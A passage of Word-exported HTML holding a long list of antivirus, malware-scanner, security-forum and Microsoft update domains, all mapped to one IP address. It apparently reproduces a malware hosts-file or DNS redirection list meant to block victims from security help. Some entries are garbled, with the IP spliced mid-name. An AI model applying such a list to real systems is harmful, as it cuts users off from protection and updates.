<span style="font-family: Arial; font-size: 10.0pt;">avira.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gratissoftwaresite.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pandasecurity.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lavasoft.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">symantec-norton.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">housecall.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.malwarebytes.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">malwarebytes.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pchelpforum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pchelpforum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.cnet.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">techsupportforum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gratissoftware.nu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">majorgeeks.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.pcworld.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.microbe.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avast.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg-antivirus.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nortonantiviruscenter.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">threatmetrix.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zonealarm.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">firewallguide.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">auditmypc.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free-firewall.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">schoonepc.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">iopus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">tucows.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg-antivirus-plus-firewall.en.softonic.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">superantispyware.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">superantispyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">harveynorman.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ca-store.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">netfreighters.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">securetec.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-spyware.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusscan.jotti.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virscan.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivir.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">analysis.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">hijackthis.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">uploadmalware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">emsisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kaspersky.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gdatasoftware.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pcpro.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cyprotect.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cloudantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb-antivir.it=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">escanav.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamwin.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vergelijk.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirusvergelijk.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virussen.upc.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.startpagina.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avastav.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">defenx.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gdata.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">removevirus.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">windows.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">answers.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">myantispyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">krebsonsecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.about.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cleanuninstall.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">staples.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">esetindia.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafee.free-trials.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivir-2012.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">panda-antivirus.en.softonic.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">softonic.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">freeantivirushelp.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">scanwith.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bestantivirusreviewed.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virus-help.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cleanallspyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kingsoftsecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">threatfire.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">freeavg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pcthreat.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">2-viruses.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trojan-killer.ne=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusinfo.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virusinfo.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">projecthoneypot.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.projecthoneypot.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">novirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.novirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-malware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.anti-malware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">offensivecomputing.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.offensivecomputing.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">zeustracker.abuse.ch=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zeustracker.abuse.ch=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.malekal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www3.malekal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.malekal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.threatexpert.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">threatexpert.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virustotal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusscan.jotti.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.av-comparatives.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av-comparatives.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av-test.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.av-test.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.scanwith.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trendmicro.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kasperskyanz.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vet.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sm.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">home.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">toolbar.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">stats.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virusbtn.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">adwarereport.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.adwarereport.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">malwarebytes.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.malwarebytes.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dw.com.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nss-shasta-rrs.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spywarewarrior.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spywarewarrior.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avsoft.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avsoft.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">onecare.live.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anubis.iseclab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wepawet.iseclab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">iseclab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.iseclab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.freespaceinternetsec=209.85.229.104urity.com<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">freespaceinternetsecurit=209.85.229.104y.com<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sunbelt-software.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sunbelt-software.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.prevx.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">prevx.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">analysis.seclab.tuwien.a=209.85.229.104c.at<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.joebox.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">joebox.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gmer.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.gmer.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antirootkit.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.antirootkit.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sectools.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sandboxie.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sandboxie.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nepenthes.mwcollect.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mwcollect.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.amtso.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">amtso.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nsslabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nsslabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.icsalabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">icsalabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.checkvir.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">checkvir.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.check-mark.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">check-mark.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.protectstar-testlab.=209.85.229.104org<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">protectstar-testlab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.anti-malware-test.co=209.85.229.104m<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-malware-test.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av-test.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.av-test.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.wildlist.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wildlist.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.aavar.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">aavar.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">centralops.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.staysafeonline.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">staysafeonline.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.rokop-security.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">rokop-security.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.wilderssecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wilderssecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.superantispyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">superantispyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kaspersky.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kaspersky.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kaspersky.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avp.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avp.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.viruslist.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">viruslist.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.viruslist.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kaspersky-antivirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kaspersky-antivirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads1.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads2.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads3.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads4.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads5.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-us1.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-us2.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-us3.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-eu1.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-eu2.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kavdumps.kaspersky.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kasperskyclub.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.kasperskyclub.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.kasperskyclub.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kasperskyclub.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kasperskyclub.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.kasperskylab.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.kaspersky.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">data.kaspersky.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">z-oleg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
